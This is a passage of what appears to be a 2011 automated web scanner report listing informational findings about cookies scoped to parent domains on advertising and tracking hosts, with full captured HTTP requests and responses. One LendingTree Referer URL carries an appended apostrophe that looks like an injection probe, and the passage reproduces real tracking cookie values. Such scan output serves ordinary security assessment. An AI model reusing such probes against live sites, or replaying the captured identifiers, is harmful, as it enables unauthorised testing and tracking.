Set-Cookie: d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ; expires=Tue, 03-May-2011 15:17:19 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Wed, 02 Feb 2011 15:17:19 GMT
Server: QS

GIF89a.......,.................D..;

11.206. http://pixel.tree.com/api/image.ashx/collect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.tree.com
Path:	/api/image.ashx/collect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 10:43:54Z; domain=.tree.com; expires=Thu, 02-Feb-2012 15:43:56 GMT; path=/; HttpOnly
t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=2; domain=.tree.com; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/image.ashx/collect?cb=1296661472842&url=http%3A%2F%2Foffers.lendingtree.com%2Fsplitter%2Fsplitter.ashx%3Fid%3Dmsnhptext12111%26promo%3D00313%26source%3D4666360%26esourceid%3D4666360%26800Num%3D1-800-289-1731'%26adtype%3D2&r=http%3A%2F%2Fburp%2Fshow%2F13 HTTP/1.1
Host: pixel.tree.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 15:43:54Z; t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, no-transform, post-check=0, pre-check=0
Content-Type: image/gif
Date: Wed, 02 Feb 2011 15:43:56 GMT
Expires: -1
p3p: policyref="http://pixel.tree.com/w3c/p3p.xml", CP="IDC DSP COR ADM DEVa TAIa PSA PSD IVAa IVDa CONi HIS OUR IND CNT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 10:43:54Z; domain=.tree.com; expires=Thu, 02-Feb-2012 15:43:56 GMT; path=/; HttpOnly
Set-Cookie: t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=2; domain=.tree.com; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-NICKNAME: RICK
X-Powered-By: ASP.NET
Content-Length: 35
Connection: keep-alive

GIF89a.............,...........D..;

11.207. http://pixel.tree.com/pt.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.tree.com
Path:	/pt.ashx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 15:43:54Z; domain=.tree.com; expires=Thu, 02-Feb-2012 15:43:54 GMT; path=/; HttpOnly
t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=1; domain=.tree.com; path=/; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pt.ashx HTTP/1.1
Host: pixel.tree.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate, no-transform, post-check=0, pre-check=0
Content-Type: text/javascript; charset=utf-8
Date: Wed, 02 Feb 2011 15:43:54 GMT
Expires: -1
p3p: policyref="http://pixel.tree.com/w3c/p3p.xml", CP="IDC DSP COR ADM DEVa TAIa PSA PSD IVAa IVDa CONi HIS OUR IND CNT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: t_lftm=v=1&id=suzsmde3PUmMmtwbDqKLSw--&bd=2011-02-02 15:43:54Z; domain=.tree.com; expires=Thu, 02-Feb-2012 15:43:54 GMT; path=/; HttpOnly
Set-Cookie: t_svis=rfr=http%3a%2f%2foffers.lendingtree.com%2fsplitter%2fsplitter.ashx%3fid%3dmsnhptext12111%26promo%3d00313%26source%3d4666360%26esourceid%3d4666360%26800Num%3d1-800-289-1731%27%26adtype%3d2&adpk=&adcc=&adcm=&adcn=&adct=&adpxl=&adtype=2&id=gc+RXd1kIkG3IiCXg3EvtA--&v=4&cnt=1; domain=.tree.com; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-NICKNAME: DANIEL
X-Powered-By: ASP.NET
Content-Length: 8627
Connection: keep-alive

var ___tree_basepath = 'http://pixel.tree.com/';
safe=encodeURIComponent;tptlogdiv=null;try{logDiv=document.createElement("div");logDiv.style.display="none";logDiv.id="__tpt_log_div";if(window.addEven
...[SNIP]...

11.208. http://px.admonkey.dapper.net/PixelMonkey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://px.admonkey.dapper.net
Path:	/PixelMonkey

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=2834773414177048; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT
data="ithwWl725iCgwVjOuIjFffXzvlgq+X6ol6Rkb4q6KW1sKZfoc8RpQzn54SyBonVLWP8y2QbCakiOvkZRtiEot+PF1HSXsMAvEmDtuCxqR8CJQvK1LhiNdbh2zB9gT82KW9kCrUiSVbgw+Mv0/kx1z4+2GEbRoAHZCdpc0OQ1u+znKWk/yeG1zq5CP50PZyBUV5qObn2MgIbI3JBFD/Bh3d3oSd7xT5XRSGnd4gJA7zNT0beuJCawAf0J1rrwaH199/iK1mPRuVI!"; Version=1; Domain=.admonkey.dapper.net; Max-Age=15552000; Expires=Sun, 31-Jul-2011 15:24:17 GMT
last_modified=1296573857201; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PixelMonkey?adid=orbitzhotels&format=image&owwste=orbitz&owwprd=hotel&owworg=&depart=Tue%20Feb%2001%202011%2000:00:00%20GMT-0600%20(Central%20Standard%20Time)&return=Wed%20Feb%2002%202011%2000:00:00%20GMT-0600%20(Central%20Standard%20Time)&owwdst=H_US_BOSTON_MA HTTP/1.1
Host: px.admonkey.dapper.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/cacheable/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.66
Date: Tue, 01 Feb 2011 15:24:17 GMT
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 2007 05:00:00 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=2834773414177048; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT
Set-Cookie: data="ithwWl725iCgwVjOuIjFffXzvlgq+X6ol6Rkb4q6KW1sKZfoc8RpQzn54SyBonVLWP8y2QbCakiOvkZRtiEot+PF1HSXsMAvEmDtuCxqR8CJQvK1LhiNdbh2zB9gT82KW9kCrUiSVbgw+Mv0/kx1z4+2GEbRoAHZCdpc0OQ1u+znKWk/yeG1zq5CP50PZyBUV5qObn2MgIbI3JBFD/Bh3d3oSd7xT5XRSGnd4gJA7zNT0beuJCawAf0J1rrwaH199/iK1mPRuVI!"; Version=1; Domain=.admonkey.dapper.net; Max-Age=15552000; Expires=Sun, 31-Jul-2011 15:24:17 GMT
Set-Cookie: last_modified=1296573857201; Domain=.admonkey.dapper.net; Expires=Sun, 31-Jul-2011 15:24:17 GMT
Location: http://cms.ad.yieldmanager.net/v1/cms?esig=1~6451b4a684f76cdc256978b3b9011cd5f8ab2361&nwid=10000358902&sigv=1
Content-Length: 0

11.209. http://r.casalemedia.com/j.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.casalemedia.com
Path:	/j.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CMID=BECVgq3LtckAABg-QdMAAAAp;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT
CMST=TUl7qk1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 03 Feb 2011 15:43:38 GMT
CMSC=TUl7qg**;domain=casalemedia.com;path=/;
CMJ2=AAJzHU1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /j.gif?u=160541&s=1 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMD3=AAFE100n1KEAAda-AAM36gEBAA**; CMD4=AAEwYE01+3gAAZshAALjFQECAA**; CMD2=AAFKkU01+3gAAZshAAM1eQEBAA**; CMID=BECVgq3LtckAABg-QdMAAAAp; CMPS=061; CMPP=006; CMS=110211&1296308414; CMD1=AADz3E1EGL4AAa6DAAMkaAEDAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Wed, 02 Feb 2011 15:43:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:43:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=BECVgq3LtckAABg-QdMAAAAp;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Tue, 03 May 2011 15:43:38 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Tue, 03 May 2011 15:43:38 GMT
Set-Cookie: CMST=TUl7qk1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 03 Feb 2011 15:43:38 GMT
Set-Cookie: CMSC=TUl7qg**;domain=casalemedia.com;path=/;
Set-Cookie: CMDD=;domain=casalemedia.com;path=/;expires=Thu, 03 Feb 2011 15:43:38 GMT
Set-Cookie: CMJ2=AAJzHU1Je6oB;domain=casalemedia.com;path=/;expires=Thu, 02 Feb 2012 15:43:38 GMT

GIF89a.............!.......,...........D..;

11.210. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=8e1bb757-a622-431b-967f-869e18a071fe; expires=Fri, 01-Feb-2013 15:14:47 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=1c6323e9-0811-5464-3af4-c00f47248395&rtb=6ch47d7o8wtv HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; p=1295929663; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:14:47 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; expires=Fri, 01-Feb-2013 15:14:47 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=irXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
F1=BIueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
7376408871=_4d48254a,7376408871,747145^961923^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/ HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; F1=BAWJI1EBAAAABAAAAIAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyat6oE!; ACID=WR910012964108340027; 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; C2=eVCSNNbjHEEqGhO; 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; ROLL=gqwLbPcy+hFCk4Ept5x+lCN!; 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 02 Feb 2011 15:40:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 02 Feb 2011 15:40:19 GMT
Connection: close
Set-Cookie: C2=irXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
Set-Cookie: F1=BIueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
Set-Cookie: ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:19 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 7376408871=_4d48254a,7376408871,747145^961923^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true">here</a>.</h2>
</body>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=krXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
F1=BQueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
1483511146=_4d482560,1483511146,747145^961923^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/ HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; F1=BAWJI1EBAAAABAAAAIAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyat6oE!; ACID=WR910012964108340027; 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; C2=eVCSNNbjHEEqGhO; 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; ROLL=gqwLbPcy+hFCk4Ept5x+lCN!; 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 02 Feb 2011 15:40:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Date: Wed, 02 Feb 2011 15:40:20 GMT
Connection: close
Set-Cookie: C2=krXSNNbjHEEqG+pgigQvJVAcueJCWYoBwZGGGaAq; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: F1=BQueJ1E; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: ROLL=gqwLZPM!; domain=advertising.com; expires=Fri, 01-Feb-2013 15:40:20 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 1483511146=_4d482560,1483511146,747145^961923^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&ref=AOL&geo=true">here</a>.</h2>
</body>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=jiCSNNbjHEEqGfugigQvJVAc; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:07 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
0572256108=_4d482547,0572256108,749715^918410^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; F1=BAWJI1EBAAAABAAAAIAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=TPQQKfQBxZgcD514adQ2mjv0dgQLL5FAodEV5BSIFyat6oE!; ACID=WR910012964108340027; 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=3TghwGitSqzY5976PrTsin6rxpK73x54NJs1OwWgDjYYaZeaDswzMIA; C2=eVCSNNbjHEEqGhO; 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; ROLL=gqwLbPcy+hFCk4Ept5x+lCN!; 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://www.merchantcircle.com/signup/partner?pid=aol&utm_source=sept2010&utm_medium=MCbanner&utm_content=728x90&utm_campaign=
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 01 Feb 2011 15:37:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 258
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:37:07 GMT
Connection: close
Set-Cookie: C2=jiCSNNbjHEEqGfugigQvJVAc; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:07 GMT; path=/
Set-Cookie: 29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 0572256108=_4d482547,0572256108,749715^918410^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.merchantcircle.com/signup/partner?pid=aol&utm_source=sept2010&utm_medium=MCbanner&utm_content=
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=riCSNNbjHEEqGfugigQvJVAcRujZvkgBoC; domain=advertising.com; expires=Thu, 31-Jan-2013 15:37:15 GMT; path=/
29104868=_4d482547,0572256108,749715^918410^1183^0,0_; domain=advertising.com; path=/click
25807272=_4d482560,1483511146,747145^961923^1183^0,0_; domain=advertising.com; path=/click
10533267=_4d48255e,5052657456,749715^964772^1183^0,0_; domain=advertising.com; path=/click
11479363=_4d48254a,7376408871,747145^961923^1183^0,0_; domain=advertising.com; path=/click
5052657456=_4d48255e,5052657456,749715^964772^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
